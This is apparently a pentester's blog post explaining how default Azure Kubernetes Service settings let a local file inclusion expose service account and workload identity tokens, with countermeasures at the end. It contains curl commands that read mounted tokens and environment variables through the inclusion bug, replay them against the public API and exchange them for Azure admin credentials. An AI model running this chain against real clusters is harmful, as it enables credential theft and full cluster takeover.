Kubernetes has become an essential component of modern web applications. Its adoption has grown rapidly in recent years, and as penetration testers and red teamers we increasingly encounter infrastructures running on Kubernetes.
However, managing a Kubernetes cluster yourself is a significant undertaking, which is why many organizations rely on managed solutions from Azure, AWS, or GCP. This blog focuses specifically on insecure default configurations in Azure Kubernetes Service (AKS) and how attackers can exploit simple vulnerabilities to potentially compromise an entire cluster.
Kubernetes Basics
| Term | Description |
| --- | --- |
| Container | A single containerd or Docker container |
| Pod | An executable unit in Kubernetes. It must contain at least one container but can also include multiple related containers |
| Namespace | A tool used to organize Kubernetes resources. Access permissions can be defined at the cluster or namespace level |
| Worker | A VM or computer capable of running pods |
| Service Account | A Kubernetes service account that allows pods to access the Kubernetes API |
| Managed Identity | An Azure service principal that allows virtual machines to access the Azure API |
For this article, two fundamental topics are relevant: the separation between the control plane and the worker nodes, and Kubernetes-internal service accounts.

The control plane is responsible for managing the entire cluster. It determines on which worker a new pod should start, whether a pod needs to scale, or if a worker has gone offline. Additionally, the control plane exposes the Kubernetes API. This API is used to manage the entire cluster (creating secrets, starting pods, executing commands in containers, etc.). The API is protected by JWTs and cannot be accessed anonymously (i.e., without a token) by default.
Tools such as kubectl also use this API under the hood. For example, the request below lists all running pods in the current namespace.
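The original request is not reproduced here; as a rough sketch, listing pods in a namespace boils down to a single authenticated GET against the API server (kubectl sends the same call under the hood, visible with `kubectl get pods -v=8`):

```bash
# List all pods in the "default" namespace via the Kubernetes API
# (<cluster-api-server> and <token> are placeholders)
curl -s --header "Authorization: Bearer <token>" \
  "https://<cluster-api-server>/api/v1/namespaces/default/pods"
```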
If a pod needs access to this API, Kubernetes uses Service Accounts. These accounts are assigned permissions within the cluster that allow them to use specific API endpoints. For example, if you run a CI/CD system such as ArgoCD (https://argoproj.github.io/cd/), it runs inside the cluster as a pod. In order for ArgoCD to create new pods, a service account with the necessary permissions must be configured.
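As an illustrative sketch (the names below are made up and not taken from the ArgoCD documentation), such a service account plus the RBAC objects granting it the right to manage pods could look like this:

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: argocd-deployer          # illustrative name
  namespace: ci
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-creator
  namespace: ci
rules:
  - apiGroups: [""]
    resources: ["pods"]
    verbs: ["create", "get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: argocd-deployer-pod-creator
  namespace: ci
subjects:
  - kind: ServiceAccount
    name: argocd-deployer
    namespace: ci
roleRef:
  kind: Role
  name: pod-creator
  apiGroup: rbac.authorization.k8s.io
```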
The JWT required for API access is managed automatically by Kubernetes and mounted into the pod at /var/run/secrets/kubernetes.io/serviceaccount/token. This happens by default for every pod, even if the service account has no permissions at all. In other words, the token ends up inside the pod unless the mount is explicitly disabled in the pod configuration.
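From inside a pod, using the mounted token is as simple as this sketch shows (kubernetes.default.svc is the in-cluster address of the API server):

```bash
# The token and CA bundle are mounted automatically into every pod
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# Call the in-cluster API with whatever permissions the service account has
curl -s --cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
     --header "Authorization: Bearer $TOKEN" \
     https://kubernetes.default.svc/api/v1/namespaces/default/pods
```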
Managed Identities in Azure
A roughly equivalent feature in Azure is Managed Identities (AWS and GCP provide similar functionality under different names). Managed Identities allow virtual machines to obtain permissions for the Azure API (management.azure.com). For example, a VM can be granted access to an Azure Storage account without any credentials being stored locally on the VM.
Applications can request an access token by calling the internally available metadata service. The required endpoint is provided by the following URL: http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
The Metadata: true header is important here; the metadata service requires it precisely to prevent the token from being retrieved via Server-Side Request Forgery (SSRF), because an attacker exploiting SSRF can usually not set arbitrary request headers.
With this access token, the application can then interact with the Azure API using the permissions granted to the Managed Identity.
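In practice, the call looks roughly like this (api-version 2018-02-01 is the documented minimum for the identity endpoint):

```bash
# Request a token for the Azure Resource Manager API from the instance metadata service
curl -s -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

# The JSON response contains an "access_token" field that can be sent as a
# Bearer token to https://management.azure.com
```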
Combining Both Worlds
With this foundational knowledge, we can now take a look at managed Kubernetes clusters in Azure.
After creating the cluster, and importantly using the default configurations, we are presented with the following overview:

What does this actually mean? The management API of the created cluster is freely accessible on the internet because IP allowlisting is not enabled by default and the cluster is not created as a private cluster. This can be seen when a simple request is sent to the above URL:
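As a sketch (the exact error body may vary depending on the cluster configuration):

```bash
# Unauthenticated request against the publicly reachable AKS API server
curl -sk https://test-vqims8hi.hcp.westeurope.azmk8s.io/api/v1/pods
# -> HTTP 401/403 with a JSON "Status" object ("Unauthorized" / "Forbidden")
```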
Since we don’t have a token, we get an “Unauthorized” response from the API. But what if the application running in one of the pods contains a vulnerability that allows arbitrary files to be read, for example a local file inclusion (LFI) or even remote code execution? As pentesters, we come across local file inclusions in particular fairly regularly.
As an example, let’s assume that a CI/CD pipeline is running in the cluster that allows build artifacts to be listed.

Clicking on the file displays its contents.

In this example, the implementation is flawed: it does not validate where the requested file may be read from (the classic mistake that makes local file inclusion possible). By manipulating the request parameter, arbitrary files can be read from the pod’s filesystem.

As a reminder, each pod has the token for cluster-internal API access mounted by default, even if this token is not used at all (/var/run/secrets/kubernetes.io/serviceaccount/token). This means that this token can be read with our simple LFI.
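With a hypothetical file parameter (the parameter name and path traversal depth depend entirely on the vulnerable application), the request could look like this:

```bash
# Abuse the LFI to read the automatically mounted service account token
# ("file" is an illustrative parameter name)
curl -s "https://ci.victim.example/artifacts/download?file=../../../../var/run/secrets/kubernetes.io/serviceaccount/token"
```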

Normally, an attacker would need the ability to execute code on this system in order to communicate internally with the API. However, our cluster’s API is accessible from the internet at test-vqims8hi.hcp.westeurope.azmk8s.io, which is confirmed by a look at the JWT:
Conversely, this means that we can use the token to authenticate to the Kubernetes API on behalf of the service account.
If this service account is allowed to read secrets in the cluster, start new pods, or change configurations, we can now do all of that from the internet.
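A sketch of what that looks like with the exfiltrated token, assuming the service account is allowed to read secrets:

```bash
TOKEN="<service account token read via the LFI>"

# List secrets in the default namespace from anywhere on the internet
curl -sk --header "Authorization: Bearer $TOKEN" \
  https://test-vqims8hi.hcp.westeurope.azmk8s.io/api/v1/namespaces/default/secrets

# kubectl works just as well:
# kubectl --server=https://test-vqims8hi.hcp.westeurope.azmk8s.io \
#   --token="$TOKEN" --insecure-skip-tls-verify get secrets --all-namespaces
```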
One Level Deeper: Authentication with Workload Identities
In practice, however, several pods with different Azure permission requirements usually run on the same Kubernetes worker, so a single managed identity at the node level is no longer sufficient. To stick with the CI/CD pipeline example: it can be split into a build manager, which needs access to a message queue and a database, and a builder, which needs access to the source repository. Both components can nevertheless run on the same worker. So-called workload identities were introduced to solve exactly this problem.
When using workload identities in Azure Kubernetes Service (AKS), the authentication process is implemented through a combination of Kubernetes service accounts, federated identities, and Azure Managed Identities. This mechanism allows pods to authenticate with the permissions of an Azure Managed Identity without storing credentials directly on the VM. The following steps describe the authentication process in detail:
- Service Account and Federated Identity Setup
- A Kubernetes service account is created and linked to a federated identity. This link is configured in Microsoft Entra ID and defines which Azure Managed Identity the service account maps to.
- Kubernetes generates a JWT (JSON Web Token) for this service account. The token is automatically mounted into the pod, and its path is stored in the AZURE_FEDERATED_TOKEN_FILE environment variable (e.g., /var/run/secrets/azure/tokens/azure-identity-token).
- Token Retrieval and Client Assertion Login
- The application in the pod reads the JWT from the mounted file path. This token serves as the client assertion in the OAuth 2.0 flow.
- Using this token together with AZURE_TENANT_ID and AZURE_CLIENT_ID (both exposed as environment variables and readable, for example, via /proc/self/environ), the application sends a POST request to https://login.microsoftonline.com/<tenant_id>/oauth2/v2.0/token.
- The request body contains the following parameters (a complete request sketch follows after this list):
  scope=https://management.azure.com/.default
  client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer
  client_id=<client_id>
  client_assertion=<JWT>
  grant_type=client_credentials
- Microsoft’s authentication service validates the JWT and issues an access token for the target resource (e.g., the Azure Management API).
- Accessing Azure Resources
- The access token received is used to send requests to the Azure API (e.g., https://management.azure.com/<resource>/listClusterAdminCredential)
- Since the token comes directly from the pod, no direct code execution is required on the worker node—only access to the JWT in the file system.
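A minimal sketch of the token request described above, assuming tenant ID, client ID, and the federated token are already known:

```bash
TENANT_ID="<AZURE_TENANT_ID>"
CLIENT_ID="<AZURE_CLIENT_ID>"
ASSERTION=$(cat /var/run/secrets/azure/tokens/azure-identity-token)

# OAuth 2.0 client credentials flow with a client assertion instead of a client secret
curl -s -X POST "https://login.microsoftonline.com/${TENANT_ID}/oauth2/v2.0/token" \
  -d "scope=https://management.azure.com/.default" \
  -d "client_id=${CLIENT_ID}" \
  -d "client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer" \
  -d "client_assertion=${ASSERTION}" \
  -d "grant_type=client_credentials"
# The response contains an "access_token" for the Azure Management API
```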

Why is this exploitable?
- LFI exploitation: If a vulnerability such as Local File Inclusion (LFI) exists in the application, an attacker can extract the JWT from /var/run/secrets/azure/tokens/azure-identity-token. This token is equivalent to a client secret and allows the creation of an access token for Azure resources.
- No code execution required: The attack works because the JWT is already available in the pod and authentication is performed via Azure’s OAuth endpoint. Even without direct code execution on the worker node, the token can be used to authenticate with Microsoft.
- Misconfigurations: By default, the JWT is automatically mounted unless explicitly disabled in the configuration. This creates a risk if pods are not strictly isolated.
The familiar CI/CD application will serve as an example again. We begin by reading the current environment variables. These are located in /proc/self/environ.

The following variables are relevant:
- AZURE_TENANT_ID
- AZURE_CLIENT_ID
- AZURE_FEDERATED_TOKEN_FILE
We can read the required token via our LFI from the path stored in AZURE_FEDERATED_TOKEN_FILE (in this case /var/run/secrets/azure/tokens/azure-identity-token).

This token is equivalent to a client secret or password and can be used for a normal login at login.microsoftonline.com. The only other pieces of information we need are the client ID and tenant ID, which we already obtained from the environment variables.
The resulting access token can now be used with the usual Microsoft administration tools or directly against the Azure API. In this case, the managed identity held a cluster administrator role, which allows the cluster admin credentials to be requested:
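A hedged sketch of that request (subscription, resource group, cluster name, and api-version are placeholders or assumptions; `az aks get-credentials --admin` wraps the same API call):

```bash
ARM_TOKEN="<access token obtained via the workload identity>"

# Request the cluster admin kubeconfig via the Azure Management API
curl -s -X POST -H "Authorization: Bearer ${ARM_TOKEN}" -H "Content-Length: 0" \
  "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ContainerService/managedClusters/<cluster-name>/listClusterAdminCredential?api-version=2024-02-01"

# The response contains a base64-encoded kubeconfig with cluster-admin permissions
```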
Countermeasures
The following measures are crucial to ensuring the security of Kubernetes clusters and managed cloud infrastructures such as Azure AKS:
- Protecting the Kubernetes API
- Ensure that AKS clusters are configured as private clusters by default. This blocks public access to the Kubernetes API and requires explicit network rules for access.
- If private clusters are not a solution, restrict access to the management plane to a few known IP addresses.
- Protecting Service Accounts
- Set the automountServiceAccountToken value to false in pod definitions to prevent the Kubernetes API token from being automatically mounted (see the snippet after this list). This keeps the token out of reach of file-read vulnerabilities such as LFI.
- Use Kubernetes Role-Based Access Control (RBAC) to grant service accounts only the minimum necessary permissions. For example, avoid sharing secrets or pod management rights unless explicitly required.
- Regular security audits and updates
- Regularly test your Kubernetes clusters and Azure infrastructure for vulnerabilities, especially for managed services such as AKS.
- The application running on Kubernetes should be tested at least as regularly.
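A minimal pod spec sketch for the automountServiceAccountToken setting mentioned above (the flag can also be set on the service account itself):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: build-worker                     # illustrative name
spec:
  automountServiceAccountToken: false    # no token under /var/run/secrets/kubernetes.io/serviceaccount/
  containers:
    - name: app
      image: registry.example.com/ci/build-worker:latest
```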
Conclusion
The combination of insecure default settings in Azure Kubernetes Service (AKS) and the automatic provisioning of service account tokens or workload identity JWTs creates significant risks for cluster security. Simple vulnerabilities such as a local file inclusion allow attackers to extract sensitive tokens from pods and misuse them to authenticate to the Kubernetes API or to Azure resources.
Security in modern environments is a joint effort and can only be achieved when all the cogs mesh together: the ops team must provide a secure infrastructure with the smallest possible attack surface, the dev team must write secure code to keep exploitable vulnerabilities from arising in the first place, and the security team must collect the relevant logs and run a functioning alerting pipeline to detect attacks. In my experience as a pentester and red teamer, however, this interplay works for very few of our customers. Security is often based on assumptions, and statements such as “That’s the security team’s job” are not uncommon. Yet everyone contributes to a secure overall system within their own area of responsibility.
